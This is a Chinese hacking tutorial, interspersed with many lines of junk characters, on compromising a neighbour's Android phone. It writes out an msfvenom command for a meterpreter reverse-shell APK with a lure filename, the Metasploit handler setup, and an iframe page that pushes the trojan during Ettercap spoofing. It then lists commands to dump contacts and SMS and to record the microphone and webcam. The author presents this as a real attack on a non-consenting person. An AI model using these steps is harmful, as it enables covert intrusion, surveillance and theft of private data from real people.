8 \9 l$ z- B z: w; }& t
五、msf+ettercap入侵邻居安卓手机
- ~, t/ O* z3 `/ o0 e. J- O6 p 8 f% N# c. G; Z0 ], V* N7 [
- t* C: [. F! y3 a( _ J, D" q 首先启动msf
4 K/ o: p. u! K
* ^* e! M) x" ~8 n, g) a6 e$ H5 X3 C) u
先用kali生成一个安卓木马,如下命令:
, v' G. D; R1 y8 V. Y, x, C 7 D# e$ y" e3 u! Q" J
) L8 P* x; p2 d8 @ e( o! U
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
0 L/ O' @ u+ o
6 [: w- S4 ~& w1 `; j
( k& e8 J' r9 e- Q 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 2 I! G/ e# e' Y2 B/ B+ Y) `* |
6 i2 R' q) H2 {: c# H& g8 i9 S' f' N' g, m
然后进入msf ' J; |1 \" b* h1 k( _. ~
6 J* S7 Z5 E% Q. g0 H; y, E" f
7 _1 s& [5 H2 V" t) Z- o! C
use exploit/multi/handler 1 I9 Z* Z# ?$ ~6 |9 q6 P
/ G2 B7 A1 }/ u/ n$ Q+ [3 D5 z e
`7 F7 Y, N/ N% ]+ z& g set payload android/meterpreter/reverse_tcp ! B- z7 b9 ?/ d. ?1 N) H) i
7 r! }) E3 n& t: G# ^0 ]
/ g( _/ v+ A- c. E1 w9 u0 t t* w/ s set LHOST 192.168.0.109 //ip为kaili的ip 8 a, {* ^4 l$ g* T
( c1 Z- v. Z @0 D2 Q& P% P
0 U/ W; V# G: ] set LPORT 44444 //端口一定要与前面生成的木马的端口一致
/ q, e2 ]5 v. ^, Z s- H
/ D1 ] g) Z- x
) V, U5 V6 z0 J; G2 K; a! i) ^9 z4 J Exploit , F% I- |4 a: H0 l! A& J) t0 u- B J
/ }: Q9 q& y8 k5 ?/ M" |
! J* {1 P0 a: }7 P, Z& O6 o
: R8 |& f6 F8 w r& U% l
5 c0 n. m8 {, F- e- W- M4 L# W3 m) s
# u3 h8 A$ @# f 下面我们开启ettercap -G
. Z7 @$ `9 z# `- x( N e0 n2 {
4 A' F+ y; c7 i7 P2 y" m' Z& F5 V; ~& z" G
我物理IP为 / N8 V+ C9 G# Q
' z* C3 y6 ]5 F, r) O
: G: z. w( @/ `! H. A
' {3 Z4 s0 ]2 v4 R8 n; j0 i
2 h; {9 |' Y3 E$ A
8 Z) m. y7 |- N1 z
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
( m7 \- U- L# O* C% d- | + v1 I4 J, o% l# m4 U; R9 N
8 E! J' ^8 h! _& l
下面我们来设置一下
6 w% t) G& }+ o Q ; ?. ~$ }* w) q A' v/ \
: G; _3 l* b, u+ g/ w+ N 8 c. G7 ~( g7 s& O# j+ [, N
# t( [+ {- z+ a
1 v( [" x, F- Q. ^ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
" k% S1 ?, d3 _ C$ k, y / J4 U! L9 k# Q* ?0 Z6 K: X
( i5 T' o1 ^8 K/ G0 l1 E
4 y6 M3 V% G# w5 p1 E. z( H
8 r9 l- x. _1 \) @
+ ^7 Q' y, Y1 `
( g% v: Z6 j& f0 t 7 y0 }7 \% b# k, g
8 U d2 ]: D$ P6 W/ Q0 i) m
0 @/ D- l9 L- @! m2 b; M 3 u6 a& E# {, A% `: Z
; H' O1 G1 k4 [! V, n' L: T0 ^0 N1 S
4 C- _8 t0 h+ ?) ]/ _) q5 y( F% m
! m# u/ _4 ~6 G) y+ M/ K7 r2 v! {/ Y" a. X# W) h
1 P( b; J8 l0 q* z
' a; f( ~" D( \8 q
, b; K- v7 s3 d& _& Q
7 I( q) t3 a& j8 V2 F
5 b/ w( o& g" o9 P% o) V; ], t! b9 N# _8 w! t# M
2 x* [5 A! d, g/ V/ \0 t4 G
V# z" j" e5 \/ Z
% i) ^) @4 c- e0 _
1 n) P/ N8 u* H1 E# f) O: F; I
9 R- F* P! a* v+ C
$ x5 M9 H$ t# _& {; O7 d $ k( [6 X) z7 _1 V& A- ?& n3 z
4 j, p: P$ ~6 u" I% A9 r
6 Q2 `5 F( V8 t b4 ~! S2 I; E
; \" d- z& E# w0 ?; b$ A4 ?# G
/ n+ n' B' r! N2 S$ i) k% A
# j4 h* u' a+ B2 J/ h+ ~) q
x( |( {, M# D
9 Q2 @. |( G& i) R5 B$ u. T! @7 d* G$ N. F6 V2 r0 b0 ~
o. W# F. o' d( D4 k* _& A - @* U3 p6 n/ t" ` f' h1 m
+ L$ D& g' `* e& d$ }
9 k2 [ P- y8 c4 Q$ m. {7 B * }$ R% S: {+ h# d5 ?$ p2 W" n
) t3 ], H0 ^2 t& j# P
下面我们开始攻击 6 t! I" E( W. o, z, h, Q J
, I# |9 M2 X, P* B
6 | {3 K5 Y9 K% B8 i N0 E& p" a
+ A& I: _2 k; M* w E1 n' K3 b " _/ ^0 c9 D8 f6 O7 |0 b" ?+ E
2 l1 E$ l- T+ y: i" }! A
. p2 o5 i: D* ?" R: `4 n: I
" `% o6 ]- a4 ?: R) u: W+ M* [- F( a0 |1 D# a9 i- h; M* r
0 H; }% B7 x6 ~7 S7 D z# F
/ \8 S! H$ u0 f+ C( @) v4 ?9 i: C, U* |1 F/ f* w7 ^
+ J" [- n2 s- p6 {- _1 D
Q2 U7 Y- R& c% F4 H, T+ R9 Z8 c6 s$ R; v1 ~3 K' h/ T$ _
' }5 ?7 j7 T2 w9 g% k; e- V
; G/ |- K4 ?& T$ J3 e$ ?9 B# E3 j. I2 [% ]; E2 r
大概过了5分钟多,发现反弹成功了 : ]( r1 e. d# k* \* V
3 q- L+ d* V6 U* @( z$ {. a. v2 w8 S- s- N( `
) ]/ v; } j8 j) q4 C0 z. p7 K
& |) v8 u! U% f4 d9 p. ~2 N9 u4 b% H8 f; H8 ^; X, G2 P* S' k' k
( y) |6 F0 ~9 ?0 T5 D; F
6 _9 K) Y# M8 A/ Q; U
) B" g1 V2 b4 h9 ~8 r/ d. f 5 S }* ] ^0 R1 a- I4 }5 Q; ]
7 m6 H$ i p& \8 r8 v$ J9 W+ Z! d$ Q0 A/ _
4 \0 ]& _( T7 s( t+ a
7 c- w) Q0 }; P, a0 _1 N9 D+ M# K+ z* P! _* k9 z
% E# W+ _ S- i7 T9 q/ o 9 m7 Y4 i% y+ _/ I7 A3 |
' g9 J3 V6 h1 o3 I ) g7 W& s8 c* g+ Y" Y5 m8 G$ L3 j* z* F. @
/ j3 D, J }( k1 E1 G' \7 |
& r7 T: } Q O# _
$ n, \; {7 s! j/ |- @
$ K, C8 v% }% w$ l- K
8 p' Q( D% g) [& W9 ]% j _ 执行命令
( X: a! r6 U7 f6 Z
3 E" h2 } @0 Y( C* t
: j. M7 S# W& U& r- r! \ r# d; m8 A# T3 P9 B/ p
& h1 H6 ]- w6 u( {" q9 F
( e# q1 ` u4 p8 X/ a, X2 y1 ` dump_contacts --》这个是导出电话 / D) g: a0 s3 |8 W7 ~
$ q" |( Q4 |8 r9 n2 Q K0 ~) D- J& y" i) c3 [8 d; m
dump_sms --》这个是导出信息 - L" s2 Y$ R" K' n
& J& g; d. Y% f( c* w
' |5 t7 v9 x( N/ P) i7 Y record_mic Record audio from the default microphone for X seconds
3 f$ o1 f$ J( W0 [6 D / \: S4 d0 b2 O
1 B6 A: T) D( K" v& R J( G# D
webcam_chat Start a video chat + w: O3 V0 o3 B$ C
% e2 j: @, B5 t! C7 k% K
p$ U9 i" z% G6 d( Y+ u/ n( N. a webcam_list List webcams + Z( L4 X: r3 e4 y5 f" A' b2 S
* Q* O4 s. M& K8 F. o3 S
# m, K6 p5 y, Y: r; t; o3 e webcam_snap Take a snapshot from the specified webcam ) o3 K/ x; Z5 K9 j O/ L- M9 k8 W
, s% y+ d8 _& t7 ]2 P) o9 K$ f. _6 p- ?
webcam_stream  lay a video stream from the specified webcam . I: w7 Q: d1 p* |4 h
5 n" m4 { \, c9 L9 Q C' i9 ~. K! E$ j
- k4 i7 k" U) \9 p
1 U1 W0 M- ` y) r# [$ `- z& U; E " C$ e2 a2 ]8 `; ~, K
7 H$ m1 ^3 a0 i& W6 _+ o0 a
1 |) E T" i1 @8 {9 E, z
; h; o6 ]: g& R* C
* Q" i9 O9 p# K6 E/ ^ ]
我们打开看一下电话薄, ; B9 D. I0 O* z7 u0 L8 U
/ b& _3 }% p$ G3 h* V7 X) W
6 L8 |% p" _8 r( t, s% J, b+ U; s 7 j; l, d" G% X8 Q9 {$ x
# r' v$ `! P ?& `/ b' \
; i. B: L" g+ N5 u8 |
: U a/ h: s1 u( p% h3 `4 H $ t9 u, w( a0 f! e8 g
7 J: A. d, w& j0 z* V
( w: O0 V" r7 }4 P0 Z0 U$ y3 o y ! @9 g! N: F5 w: L4 r3 b% {! w Q
& h9 S0 I( R, J, Y6 m$ H0 W
1 }- t: J2 p" k
4 Y Y1 W+ O( G" a2 x6 o4 Z0 ~/ k% n
9 p6 K1 y7 G) j8 S% U
6 ?) t( y. r8 l" F" h* U
5 l9 O0 O& S- Y% w1 M( X3 I1 X: A0 Z ; e& y3 `8 N, r; v
9 l, c" x& g" _5 b+ r) b
9 a( |" n; r- V7 r 我们同时欺骗成DroidJack木马,使用方法如图:
]7 W4 L- L) g& D" J& ^2 ^( E . D, j; |8 w1 ^' T
$ N2 V# K2 J1 b3 |$ l
+ \0 v" K8 U# B$ q( K! L9 y - x, h) c* [! m+ i3 ^
. s# {+ K2 ?" N2 T
: U( ?+ ? m" K; b: [4 |2 ^
, H- `' _8 c* k9 g. S. Y
3 ]7 ]4 \: Q3 h) p* C9 K 9 |. z% v2 h& v+ g" V
0 f- [2 P/ N/ S; ~1 i( ?
/ }* O0 i9 O) v; U 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
' Q" F$ B9 L+ s& ` 1 s* f# n' o7 e0 R9 p# ^0 S. `
( M; d& K/ D+ c2 J" n. ]/ S d. w1 A% X N2 w, a# p) L; w
# B; t$ x) i' n7 t: I5 H: Y p ]% o3 Z* i4 c
7 z" U5 B2 u( J; j, f3 K- t
% x* z; W* J4 P& S. w8 g8 A- g+ v% T) h0 d9 v( s. I. X( z1 N2 G
, M: j; p2 J( k2 }6 r. v1 p6 H: R
8 N5 f* z/ k2 N" R5 z- f" [- S' u9 Q' L/ [" D; t5 w
! D' Q6 J1 J2 t! i/ H4 o+ D9 w* K X) d# ^; ]1 o; e4 Q6 M/ s
+ e- B& e) w; v3 W2 S! C$ [ j$ p2 @ ' ^6 i6 ?5 M8 {
|